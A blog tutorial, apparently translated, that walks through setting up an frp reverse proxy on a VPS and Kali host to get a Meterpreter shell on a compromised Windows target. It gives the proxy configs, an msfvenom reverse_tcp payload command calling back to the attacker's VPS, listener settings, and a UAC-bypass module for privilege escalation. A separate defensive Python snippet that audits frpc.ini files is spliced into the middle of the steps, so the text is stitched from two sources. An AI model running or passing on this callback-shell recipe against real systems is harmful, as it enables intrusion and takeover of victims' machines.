FRP reverse proxy +msf get shell
2022-07-03 00:15:00 【Lomi only bear】
0x00: Brief introduction
frp is a reverse proxy tool that makes it easy to traverse NAT into an internal network and expose internal services to the Internet. frp supports TCP, HTTP, HTTPS and other protocol types, and its web services support routing and forwarding based on domain name.
0x01: Environment
Target machine: x.x.174.171 (hereinafter "target")
kali: 192.168.1.106 (hereinafter "kali")
vps: x.x.193.94 (hereinafter "vps")
A webshell has already been obtained on the target.
0x02: Setting up the reverse proxy
1. Download frp on the vps and edit frps.ini
vim frps.ini
[common]
# Connection port between the frp server and client; frps and frpc must use the same value
bind_port = 7000
Start frps: ./frps -c ./frps.ini
2. Download frp on kali and edit frpc.ini
vim frpc.ini
[common]
server_addr = x.x.193.94
# frpc working port; must match bind_port in frps.ini above
server_port = 7000
[msf]
type = tcp
local_ip = 127.0.0.1
# Forwarded to port 5555 on this machine
local_port = 5555
# Port 6000 on the server is forwarded to the local machine
remote_port = 6000
Start frpc: ./frpc -c ./frpc.ini
At this point the frp reverse proxy is set up. Next, generate the MSF payload and set up the listener.
3. Generate the MSF payload
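Seen from the defender's side, an frpc.ini recovered from a host states exactly which local ports are published on which external server. The following is an added example, not part of the original post: it parses the legacy INI layout shown above and summarises each tunnel. The function name `summarize_frpc`, the sample file and the address 203.0.113.10 are constructed for illustration, and the reading of a missing `token` key as an unauthenticated link is an assumption about frp's behaviour.

```python
import configparser

# Constructed sample in the legacy frp INI layout used on this page;
# 203.0.113.10 is a documentation address standing in for the vps.
SAMPLE_FRPC_INI = """
[common]
server_addr = 203.0.113.10
server_port = 7000  # must match bind_port in frps.ini

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555   # forwarded to this machine
remote_port = 6000  # published on the server
"""


def summarize_frpc(ini_text):
    """Return (server, tunnels, findings) for the body of an frpc.ini."""
    # Inline comments appear in the page's config, so strip them while parsing.
    cp = configparser.ConfigParser(
        inline_comment_prefixes=("#", ";"), interpolation=None
    )
    cp.read_string(ini_text)
    if not cp.has_section("common"):
        raise ValueError("no [common] section: not an frpc.ini")
    common = cp["common"]
    server = f"{common.get('server_addr', '?')}:{common.get('server_port', '?')}"
    findings = []
    # Assumption: without a token, frps accepts any client that reaches it.
    if not common.get("token"):
        findings.append("no token in [common]: client/server link unauthenticated")
    tunnels = []
    for name in cp.sections():
        if name == "common":
            continue  # every other section defines one proxied service
        sec = cp[name]
        local = f"{sec.get('local_ip', '?')}:{sec.get('local_port', '?')}"
        remote_port = sec.get("remote_port")
        tunnels.append({"name": name, "type": sec.get("type", "?"),
                        "local": local, "remote_port": remote_port})
        if local.startswith("127."):
            findings.append(
                f"[{name}] publishes loopback service {local} "
                f"on server port {remote_port}"
            )
    return server, tunnels, findings
```
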
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe
Note:
lport is the remote_port = 6000 port from your frpc.ini.
4. Set up the listener and run the MSF payload
Note:
# Listening IP; must match local_ip in frpc.ini
set lhost 127.0.0.1
# Listening port; must match local_port in frpc.ini
set lport 5555
Run i.exe on the target.
Observe frp on the vps
Observe the local kali
Shell obtained
Tips: the built-in Local Exploit Suggester module can help identify which vulnerabilities on the system are exploitable and suggest the most suitable exploit, which can then be used for further privilege escalation.
The bypassuac module I use most often:
exploit/windows/local/bypassuac